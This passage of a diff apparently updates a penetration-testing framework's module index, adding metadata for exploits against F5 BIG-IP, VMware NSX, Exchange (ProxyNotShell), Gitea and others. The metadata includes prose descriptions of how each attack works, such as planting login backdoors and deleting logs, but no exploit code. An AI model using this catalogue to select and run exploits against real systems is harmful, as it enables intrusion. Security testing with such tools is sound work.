+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "URL-https://support.f5.com/csp/article/K13325942"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Default"
+    ],
+    "mod_time": "2022-11-23 10:42:07 +0000",
+    "path": "/modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
+  "exploit_linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622": {
+    "name": "F5 BIG-IP iControl CSRF File Write SOAP API",
+    "fullname": "exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-11-16",
+    "type": "exploit",
+    "author": [
+      "Ron Bowes"
+    ],
+    "description": "This module exploits a cross-site request forgery (CSRF) vulnerability\n          in F5 Big-IP's iControl interface to write an arbitrary file to the\n          filesystem.\n\n          While any file can be written to any location as root, the\n          exploitability is limited by SELinux; the vast majority of writable\n          locations are unavailable. By default, we write to a script that\n          executes at reboot, which means the payload will execute the next time\n          the server boots.\n\n          An alternate target - Login - will add a backdoor that executes next\n          time a user logs in interactively. This overwrites a file,\n          but we restore it when we get a session\n\n          Note that because this is a CSRF vulnerability, it starts a web\n          server, but an authenticated administrator must visit the site, which\n          redirects them to the target.",
+    "references": [
+      "CVE-2022-41622",
+      "URL-https://github.com/rbowes-r7/refreshing-soap-exploit",
+      "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/",
+      "URL-https://support.f5.com/csp/article/K97843387",
+      "URL-https://support.f5.com/csp/article/K94221585",
+      "URL-https://support.f5.com/csp/article/K05403841"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd",
+    "rport": 443,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Restart",
+      "Login",
+      "Custom"
+    ],
+    "mod_time": "2022-11-18 16:18:25 +0000",
+    "path": "/modules/exploits/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_linux/http/flir_ax8_unauth_rce_cve_2022_37061": {
    "name": "FLIR AX8 unauthenticated RCE",
    "fullname": "exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061",
@@ -62776,7 +63068,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/linux/http/gravcms_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/gravcms_exec",
@@ -66286,6 +66578,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/opentsdb_yrange_cmd_injection": {
+    "name": "OpenTSDB 2.4.0 unauthenticated command injection",
+    "fullname": "exploit/linux/http/opentsdb_yrange_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-18",
+    "type": "exploit",
+    "author": [
+      "Shai rod",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in the yrange parameter in OpenTSDB through\n          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated\n          remote code execution as the root user.\n\n          The module first attempts to obtain the OpenTSDB version via\n          the api. If the version is 2.4.0 or lower, the module\n          performs additional checks to obtain the configured metrics\n          and aggregators. It then randomly selects one metric and one\n          aggregator and uses those to instruct the target server to\n          plot a graph. As part of this request, the yrange parameter is\n          set to the payload, which will then be executed by the target\n          if the latter is vulnerable.\n\n          This module has been successfully tested against OpenTSDB\n          version 2.3.0.",
+    "references": [
+      "CVE-2020-35476",
+      "URL-https://github.com/OpenTSDB/opentsdb/issues/2051"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 4242,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2022-12-23 13:38:16 +0000",
+    "path": "/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/opentsdb_yrange_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_fms_events_exec": {
    "name": "Pandora FMS Events Remote Command Execution",
    "fullname": "exploit/linux/http/pandora_fms_events_exec",
@@ -69822,6 +70176,72 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144": {
+    "name": "VMware NSX Manager XStream unauthenticated RCE",
+    "fullname": "exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-10-25",
+    "type": "exploit",
+    "author": [
+      "h00die-gr3y",
+      "Sina Kheirkhah",
+      "Steven Seeley"
+    ],
+    "description": "VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library.\n          VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.\n          Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),\n          a malicious actor can get remote code execution in the context of 'root' on the appliance.\n          VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13\n          are vulnerable to Remote Command Injection.\n\n          This module exploits the vulnerability to upload and execute payloads gaining root privileges.",
+    "references": [
+      "CVE-2021-39144",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2022-0027.html",
+      "URL-https://kb.vmware.com/s/article/89809",
+      "URL-https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html",
+      "URL-https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix (In-Memory)",
+      "Linux Dropper"
+    ],
+    "mod_time": "2022-11-12 10:21:43 +0000",
+    "path": "/modules/exploits/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/vmware_vcenter_analytics_file_upload": {
    "name": "VMware vCenter Server Analytics (CEIP) Service File Upload",
    "fullname": "exploit/linux/http/vmware_vcenter_analytics_file_upload",
@@ -70947,7 +71367,7 @@
    "targets": [
      "Zimbra Collaboration Suite"
    ],
-    "mod_time": "2022-10-19 10:02:29 +0000",
+    "mod_time": "2022-11-23 13:09:47 +0000",
    "path": "/modules/exploits/linux/http/zimbra_cpio_cve_2022_41352.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zimbra_cpio_cve_2022_41352",
@@ -71077,7 +71497,7 @@
    "targets": [
      "Zimbra Collaboration Suite"
    ],
-    "mod_time": "2022-08-17 10:19:36 +0000",
+    "mod_time": "2022-12-06 15:07:28 +0000",
    "path": "/modules/exploits/linux/http/zimbra_unrar_cve_2022_30333.rb",
    "is_install_path": true,
    "ref_name": "linux/http/zimbra_unrar_cve_2022_30333",
@@ -73866,7 +74286,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-10-08 09:50:25 +0000",
+    "mod_time": "2022-11-25 15:13:57 +0000",
    "path": "/modules/exploits/linux/local/polkit_dbus_auth_bypass.rb",
    "is_install_path": true,
    "ref_name": "linux/local/polkit_dbus_auth_bypass",
@@ -73978,7 +74398,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-11-12 16:19:50 +0000",
    "path": "/modules/exploits/linux/local/ptrace_traceme_pkexec_helper.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ptrace_traceme_pkexec_helper",
@@ -74695,7 +75115,7 @@
    "targets": [
      "Auto"
    ],
-    "mod_time": "2022-10-03 16:53:14 +0000",
+    "mod_time": "2022-12-01 14:34:09 +0000",
    "path": "/modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb",
    "is_install_path": true,
    "ref_name": "linux/local/ubuntu_enlightenment_mount_priv_esc",
@@ -74876,6 +75296,66 @@
    ],
    "needs_cleanup": true
  },
+  "exploit_linux/local/vcenter_java_wrapper_vmon_priv_esc": {
+    "name": "VMware vCenter vScalation Priv Esc",
+    "fullname": "exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2021-09-21",
+    "type": "exploit",
+    "author": [
+      "h00die",
+      "Yuval Lazar"
+    ],
+    "description": "This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the\n          /usr/lib/vmware-vmon/java-wrapper-vmon file. It is possible for anyone in the\n          cis group to write to the file, which will execute as root on vmware-vmon service\n          restart or host reboot.\n\n          This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.\n          The following versions should be vulnerable:\n          vCenter 7.0 before U2c\n          vCenter 6.7 before U3o\n          vCenter 6.5 before U3q",
+    "references": [
+      "URL-https://pentera.io/blog/vscalation-cve-2021-22015-local-privilege-escalation-in-vmware-vcenter-pentera-labs/",
+      "CVE-2021-22015",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2021-0020.html"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-12-01 14:55:43 +0000",
+    "path": "/modules/exploits/linux/local/vcenter_java_wrapper_vmon_priv_esc.rb",
+    "is_install_path": true,
+    "ref_name": "linux/local/vcenter_java_wrapper_vmon_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-service-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes",
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "vScalation"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_linux/local/vmware_alsa_config": {
    "name": "VMware Workstation ALSA Config File Local Privilege Escalation",
    "fullname": "exploit/linux/local/vmware_alsa_config",
@@ -83742,6 +84222,67 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/churchinfo_upload_exec": {
+    "name": "ChurchInfo 1.2.13-1.3.0 Authenticated RCE",
+    "fullname": "exploit/multi/http/churchinfo_upload_exec",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2021-10-30",
+    "type": "exploit",
+    "author": [
+      "m4lwhere <m4lwhere@protonmail.com>"
+    ],
+    "description": "This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.\n          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the\n          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and\n          then browsing to the location of the uploaded PHP file on the web server, arbitrary code\n          execution as the web daemon user (e.g. www-data) can be achieved.",
+    "references": [
+      "URL-http://www.churchdb.org/",
+      "URL-http://sourceforge.net/projects/churchinfo/",
+      "CVE-2021-43258"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Targeting"
+    ],
+    "mod_time": "2022-11-18 18:04:51 +0000",
+    "path": "/modules/exploits/multi/http/churchinfo_upload_exec.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/churchinfo_upload_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "CRASH_SAFE"
+      ],
+      "Reliability": [
+        "REPEATABLE_SESSION"
+      ],
+      "SideEffects": [
+        "ARTIFACTS_ON_DISK",
+        "IOC_IN_LOGS"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_multi/http/cisco_dcnm_upload": {
    "name": "Cisco Prime Data Center Network Manager Arbitrary File Upload",
    "fullname": "exploit/multi/http/cisco_dcnm_upload",
@@ -85223,6 +85764,70 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_multi/http/gitea_git_fetch_rce": {
+    "name": "Gitea Git Fetch Remote Code Execution",
+    "fullname": "exploit/multi/http/gitea_git_fetch_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-05-16",
+    "type": "exploit",
+    "author": [
+      "wuhan005",
+      "li4n0",
+      "krastanoel"
+    ],
+    "description": "This module exploits Git fetch command in Gitea repository migration\n          process that leads to a remote command execution on the system.\n          This vulnerability affect Gitea before 1.16.7 version.",
+    "references": [
+      "CVE-2022-30781",
+      "URL-https://tttang.com/archive/1607/"
+    ],
+    "platform": "Linux,Unix,Windows",
+    "arch": "cmd",
+    "rport": 3000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
+    ],
+    "mod_time": "2022-11-17 12:25:52 +0000",
+    "path": "/modules/exploits/multi/http/gitea_git_fetch_rce.rb",
+    "is_install_path": true,
+    "ref_name": "multi/http/gitea_git_fetch_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_multi/http/gitea_git_hooks_rce": {
    "name": "Gitea Git Hooks Remote Code Execution",
    "fullname": "exploit/multi/http/gitea_git_hooks_rce",
@@ -87287,7 +87892,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2022-03-22 08:55:59 +0000",
+    "mod_time": "2022-12-15 12:51:30 +0000",
    "path": "/modules/exploits/multi/http/log4shell_header_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/log4shell_header_injection",
@@ -98240,7 +98845,7 @@
      "Apache OpenOffice on Windows (PSH)",
      "Apache OpenOffice on Linux/OSX (Python)"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-11-30 22:10:18 +0000",
    "path": "/modules/exploits/multi/misc/openoffice_document_macro.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/openoffice_document_macro",
@@ -101198,6 +101803,62 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/local/acronis_trueimage_xpc_privesc": {
+    "name": "Acronis TrueImage XPC Privilege Escalation",
+    "fullname": "exploit/osx/local/acronis_trueimage_xpc_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-11",
+    "type": "exploit",
+    "author": [
+      "Csaba Fitzl",
+      "Shelby Pace"
+    ],
+    "description": "Acronis TrueImage versions 2019 update 1 through 2021 update 1\n          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`\n          helper tool does not perform any validation on connecting clients,\n          which gives arbitrary clients the ability to execute functions provided\n          by the helper tool with `root` privileges.",
+    "references": [
+      "CVE-2020-25736",
+      "URL-https://kb.acronis.com/content/68061",
+      "URL-https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-12-13 09:49:59 +0000",
+    "path": "/modules/exploits/osx/local/acronis_trueimage_xpc_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/acronis_trueimage_xpc_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_osx/local/cfprefsd_race_condition": {
    "name": "macOS cfprefsd Arbitrary File Write Local Privilege Escalation",
    "fullname": "exploit/osx/local/cfprefsd_race_condition",
@@ -104248,7 +104909,7 @@
      "Unix Command",
      "BSD Dropper"
    ],
-    "mod_time": "2022-10-12 19:23:59 +0000",
+    "mod_time": "2022-10-24 14:17:21 +0000",
    "path": "/modules/exploits/unix/http/pfsense_pfblockerng_webshell.rb",
    "is_install_path": true,
    "ref_name": "unix/http/pfsense_pfblockerng_webshell",
@@ -104560,6 +105221,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/syncovery_linux_rce_2022_36534": {
+    "name": "Syncovery For Linux Web-GUI Authenticated Remote Command Execution",
+    "fullname": "exploit/unix/http/syncovery_linux_rce_2022_36534",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-06",
+    "type": "exploit",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux.\n          Successful exploitation results in remote code execution under the context of the root user.\n\n          Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.\n          Jobs can contain arbitrary system commands and will be executed as root.\n          A valid username and password or a session token is needed to exploit the vulnerability.\n          The profile and its log file will be deleted afterwards to disguise the attack.\n\n          The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.",
+    "references": [
+      "URL-https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/",
+      "CVE-2022-36534"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Syncovery for Linux < 9.48j"
+    ],
+    "mod_time": "2022-12-14 08:38:20 +0000",
+    "path": "/modules/exploits/unix/http/syncovery_linux_rce_2022_36534.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/syncovery_linux_rce_2022_36534",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_unix/http/tnftp_savefile": {
    "name": "tnftp \"savefile\" Arbitrary Command Execution",
    "fullname": "exploit/unix/http/tnftp_savefile",
@@ -131862,7 +132582,7 @@
      "John Page (aka hyp3rlinx)",
      "Brenner Little"
    ],
-    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files <c:Url> node param which takes an expected website value, however if an attacker references an\n        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n        Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n        Making matters worse is if the the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n        The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.",
+    "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.\n        User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of \".contact\" files <c:Url> node param which takes an expected website value, however if an attacker references an\n        executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.\n        Executable files can live in a sub-directory so when the \".contact\" website link is clicked it traverses directories towards the executable and runs.\n        Making matters worse is if the files are compressed then downloaded \"mark of the web\" (MOTW) may potentially not work as expected with certain archive utilitys.\n        The \".\\\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.\n        This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.",
    "references": [
      "EDB-46188",
      "URL-http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt",
@@ -131880,7 +132600,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/windows/fileformat/microsoft_windows_contact.rb",
    "is_install_path": true,
    "ref_name": "windows/fileformat/microsoft_windows_contact",
@@ -140770,7 +141490,7 @@
      "v9.2.0 - v9.2.1",
      "v9.2.2 - v9.3.0-RC"
    ],
-    "mod_time": "2022-03-10 10:28:25 +0000",
+    "mod_time": "2022-12-04 17:50:24 +0000",
    "path": "/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/dnn_cookie_deserialization_rce",
@@ -141765,6 +142485,79 @@
    "session_types": false,
    "needs_cleanup": true
  },
+  "exploit_windows/http/exchange_proxynotshell_rce": {
+    "name": "Microsoft Exchange ProxyNotShell RCE",
+    "fullname": "exploit/windows/http/exchange_proxynotshell_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-28",
+    "type": "exploit",
+    "author": [
+      "Orange Tsai",
+      "Spencer McIntyre",
+      "DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q",
+      "Piotr Bazydło",
+      "Rich Warren",
+      "Soroush Dalili"
+    ],
+    "description": "This module chains two vulnerabilities on Microsoft Exchange Server\n          that, when combined, allow an authenticated attacker to interact with\n          the Exchange Powershell backend (CVE-2022-41040), where a\n          deserialization flaw can be leveraged to obtain code execution\n          (CVE-2022-41082). This exploit only support Exchange Server 2019.\n\n          These vulnerabilities were patched in November 2022.",
+    "references": [
+      "CVE-2022-41040",
+      "CVE-2022-41082",
+      "URL-https://www.zerodayinitiative.com/blog/2022/11/14/control-your-types-or-get-pwned-remote-code-execution-in-exchange-powershell-backend",
+      "URL-https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/",
+      "URL-https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9",
+      "URL-https://rw.md/2022/11/09/ProxyNotRelay.html"
+    ],
+    "platform": "Windows",
+    "arch": "cmd, x64, x86",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Dropper",
+      "Windows Command"
+    ],
+    "mod_time": "2022-11-28 10:06:14 +0000",
+    "path": "/modules/exploits/windows/http/exchange_proxynotshell_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/exchange_proxynotshell_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "AKA": [
+        "ProxyNotShell"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/exchange_proxyshell_rce": {
    "name": "Microsoft Exchange ProxyShell RCE",
    "fullname": "exploit/windows/http/exchange_proxyshell_rce",
@@ -141818,7 +142611,7 @@
      "Windows Dropper",
      "Windows Command"
    ],
-    "mod_time": "2021-11-10 11:12:38 +0000",
+    "mod_time": "2022-12-02 15:55:10 +0000",
    "path": "/modules/exploits/windows/http/exchange_proxyshell_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/http/exchange_proxyshell_rce",
@@ -151401,7 +152194,7 @@
    "targets": [
      "Adobe Reader X 10.1.4 / Windows 7 SP1"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/windows/local/adobe_sandbox_adobecollabsync.rb",
    "is_install_path": true,
    "ref_name": "windows/local/adobe_sandbox_adobecollabsync",
@@ -151979,7 +152772,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_dotnet_profiler",
@@ -152123,7 +152916,7 @@
      "Windows x86",
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-04 17:41:24 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_injection.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_injection",
@@ -152211,7 +153004,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_sdclt",
@@ -152450,7 +153243,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_windows_store_reg",
@@ -152783,7 +153576,7 @@
      "unamer",
      "timwr"
    ],
-    "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n            within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n            to write a limited amount of controlled data to an attacker controlled address\n            in kernel memory. By utilizing this vulnerability to execute controlled writes\n            to kernel memory, an attacker can gain arbitrary code execution\n            as the SYSTEM user.\n\n            This module has been tested against Windows 7 x64 SP1. Offsets within the\n            exploit code may need to be adjusted to work with other versions of Windows.\n            The exploit can only be triggered once against the target and can cause the\n            target machine to reboot when the session is terminated.",
+    "description": "This module exploits CVE-2019-1458, an arbitrary pointer dereference vulnerability\n          within win32k which occurs due to an uninitalized variable, which allows user mode attackers\n          to write a limited amount of controlled data to an attacker controlled address\n          in kernel memory. By utilizing this vulnerability to execute controlled writes\n          to kernel memory, an attacker can gain arbitrary code execution\n          as the SYSTEM user.\n\n          This module has been tested against Windows 7 x64 SP1. Offsets within the\n          exploit code may need to be adjusted to work with other versions of Windows.\n          The exploit can only be triggered once against the target and can cause the\n          target machine to reboot when the session is terminated.",
    "references": [
      "CVE-2019-1458",
      "URL-https://github.com/unamer/CVE-2019-1458",
@@ -152803,7 +153596,7 @@
    "targets": [
      "Windows 7 x64"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-12-05 10:30:53 +0000",
    "path": "/modules/exploits/windows/local/cve_2019_1458_wizardopium.rb",
